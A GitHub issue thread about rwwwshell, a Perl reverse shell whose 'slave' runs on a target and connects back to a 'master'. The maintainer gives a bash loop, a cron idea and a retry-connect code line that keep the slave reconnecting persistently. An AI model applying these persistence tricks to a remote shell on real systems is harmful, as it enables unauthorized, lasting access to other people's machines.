### ISSUE TITLE
Doubt Slave

### ISSUE THREAD

**Issue by d0ubl3puls4r** [DtxdF/rwwwshell#1]
I would like to know that it is possible to leave Slave mode on the target system running at all times without having to run the $ perl rwwwshell-2.0.pl slave command all the time.

Because when I execute this Slave command it takes a few seconds to connect to the Master, is it possible once executing the slave command it is in connection mode without stopping?
Thank you very much in advance.

In short, when I perform

$ perl rwwwshell-2.0.pl slave
the message appears:
Starting in Slave mode

If the Master is not running at this time to receive the connection, goes to the Slave command, being necessary to do everything again, ideally this command would be running trying the connection at all times and not stop.

**Comment by DtxdF** [comment]
I could make a small script that executes the command indefinitely. You can do it with a "while" cycle.

example:

```bash
while [ 1 ];do
perl rwwwshell-2.0.pl slave
done
```
You can also try an alternative called Miindeath: https://github.com/DtxdF/Miindeath

**Comment by d0ubl3puls4r** [comment]
> 
> 
> I could make a small script that executes the command indefinitely. You can do it with a "while" cycle.
> 
> example:
> 
> ```shell
> while [ 1 ];do
> perl rwwwshell-2.0.pl slave
> done
> ```
> 
> You can also try an alternative called Miindeath: https://github.com/DtxdF/Miindeath

Very good, it worked here perfectly, now I was wondering if it is possible to leave the slave terminal tbm after executing the command, because when the executable gets the message "Starting in slave mode", there is some way to make the program run in memory without locking the terminal on which it is running?

**Comment by DtxdF** [comment]
I got to messing around with the shell code a bit and it has a bug when you try to make it a background job, even if it's a child process, so it occurred to me to use cron as an ally and I modified a little line ( 207) and added the following:
```
		...
		while (!connect(THC, $remote)) {};
		...
```
With what is shown above you will not have to depend on the shell and if you assign a new task to cron, it may not be what you asked for but it works.

**Comment by d0ubl3puls4r** [comment]
> I got to messing around with the shell code a bit and it has a bug when you try to make it a background job, even if it's a child process, so it occurred to me to use cron as an ally and I modified a little line ( 207) and added the following:
> 
> ```
> 		...
> 		while (!connect(THC, $remote)) {};
> 		...
> ```
> 
> With what is shown above you will not have to depend on the shell and if you assign a new task to cron, it may not be what you asked for but it works.

did you add that line above to the tool code or will you add it?  I downloaded the tool again to test it and it only works by setting it as you told me earlier with while, it would be interesting if you put this function in the tool code so that there is no need to type so much on the terminal line on the slave machine,  as far as cron seems to be.  a great idea yes, leave scheduled the execution of the tool, I will test as soon as I can

**Comment by DtxdF** [comment]
Sí, sé que es mucho trabajo hacer algo simple, pero no quiero modificar la herramienta, quiero dejarla como estaba en Mr. Robot.

Aunque juega con el código de la herramienta, aprenderá mucho.

**Comment by DtxdF** [comment]
Yes, I know it is a lot of work to do something simple, but I don't want to modify the tool, I want to leave it as it was in Mr. Robot.

Although you play with the tool's code, you will learn a lot.
